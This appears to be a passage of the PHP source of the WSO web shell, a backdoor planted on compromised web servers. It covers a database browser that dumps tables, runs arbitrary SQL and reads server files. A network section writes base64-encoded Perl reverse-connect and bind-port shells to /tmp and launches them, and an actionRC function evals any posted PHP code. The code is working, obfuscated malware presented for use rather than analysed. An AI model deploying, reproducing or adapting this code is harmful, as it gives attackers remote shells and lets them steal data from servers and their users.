						foreach($item as $k=>$v) {
                            if($v === null)
                                $item[$k] = "NULL";
                            elseif(is_int($v))
                                $item[$k] = $v;
                            else
                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
							$columns[] = "`".$k."`";
						}
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $item).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
					}
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
				break;
				case 'pgsql':
					$this->query('SELECT * FROM '.$table);
					while($item = $this->fetch()) {
						$columns = array();
						foreach($item as $k=>$v) {
							$item[$k] = "'".addslashes($v)."'";
							$columns[] = $k;
						}
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
					}
				break;
			}
			return false;
		}
	};
	$db = new DbClass($_POST['type']);
	if(@$_POST['p2']=='download') {
		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
		$db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
				$db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
	}
	wsoHeader();
	echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
	$tmp = "<input type=text name=sql_base value=''>";
	if(isset($_POST['sql_host'])){
		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
			switch($_POST['charset']) {
				case "Windows-1251": $db->setCharset('cp1251'); break;
				case "UTF-8": $db->setCharset('utf8'); break;
				case "KOI8-R": $db->setCharset('koi8r'); break;
				case "KOI8-U": $db->setCharset('koi8u'); break;
				case "cp866": $db->setCharset('cp866'); break;
			}
			$db->listDbs();
			echo "<select name=sql_base><option value=''></option>";
			while($item = $db->fetch()) {
				list($key, $value) = each($item);
				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
			}
			echo '</select>';
		}
		else echo $tmp;
	}else
		echo $tmp;
	echo "</td>
				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
			</tr>
		</table>
		<script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
			function st(t,l) {
				d.sf.p1.value = 'select';
				d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
				d.sf.submit();
			}
			function is() {
				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
			}
		</script>";
	if(isset($db) && $db->link){
		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
			if(!empty($_POST['sql_base'])){
				$db->selectdb($_POST['sql_base']);
				echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
				$tbls_res = $db->listTables();
				while($item = $db->fetch($tbls_res)) {
					list($key, $value) = each($item);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
					$value = htmlspecialchars($value);
					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
				}
				echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
				if(@$_POST['p1'] == 'select') {
					$_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
					$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
					$num = $db->fetch();
					$pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
					if($_POST['type']=='pgsql')
						$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
					else
						$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
					echo "<br><br>";
				}
				if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
					$db->query(@$_POST['p2']);
					if($db->res !== false) {
						$title = false;
						echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
						$line = 1;
						while($item = $db->fetch())	{
							if(!$title)	{
								echo '<tr>';
								foreach($item as $key => $value)
									echo '<th>'.$key.'</th>';
								reset($item);
								$title=true;
								echo '</tr><tr>';
								$line = 2;
							}
							echo '<tr class="l'.$line.'">';
							$line = $line==1?2:1;
							foreach($item as $key => $value) {
								if($value == null)
									echo '<td><i>null</i></td>';
								else
									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
							}
							echo '</tr>';
						}
						echo '</table>';
					} else {
						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
					}
				}
				echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
				echo "</td></tr>";
			}
			echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
			if(@$_POST['p1'] == 'loadfile') {
				$file = $db->loadFile($_POST['p2']);
				echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
			}
	} else {
        echo htmlspecialchars($db->error());
    }
	echo '</div>';
	wsoFooter();
}
function actionNetwork() {
	wsoHeader();
	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
	<span>Bind port to /bin/sh [perl]</span><br/>
	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form>
	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
	<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form><br>";
	if(isset($_POST['p1'])) {
		function cf($f,$t) {
			$w = @fopen($f,"w") or @function_exists('file_put_contents');
			if($w){
				@fwrite($w,@base64_decode($t));
				@fclose($w);
			}
		}
		if($_POST['p1'] == 'bpp') {
			cf("/tmp/bp.pl",$bind_port_p);
			$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
            sleep(1);
			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
            unlink("/tmp/bp.pl");
		}
		if($_POST['p1'] == 'bcp') {
			cf("/tmp/bc.pl",$back_connect_p);
			$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
            sleep(1);
			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
            unlink("/tmp/bc.pl");
		}
	}
	echo '</div>';
	wsoFooter();
}
function actionRC() {
	if(!@$_POST['p1']) {
		$a = array(
			"uname" => php_uname(),
			"php_version" => phpversion(),
			"wso_version" => WSO_VERSION,
			"safemode" => @ini_get('safe_mode')
		);
		echo serialize($a);
	} else {
		eval($_POST['p1']);
	}
}
if( empty($_POST['a']) )
	if(isset($default_action) && function_exists('action' . $default_action))
		$_POST['a'] = $default_action;
	else
		$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
	call_user_func('action' . $_POST['a']);
exit;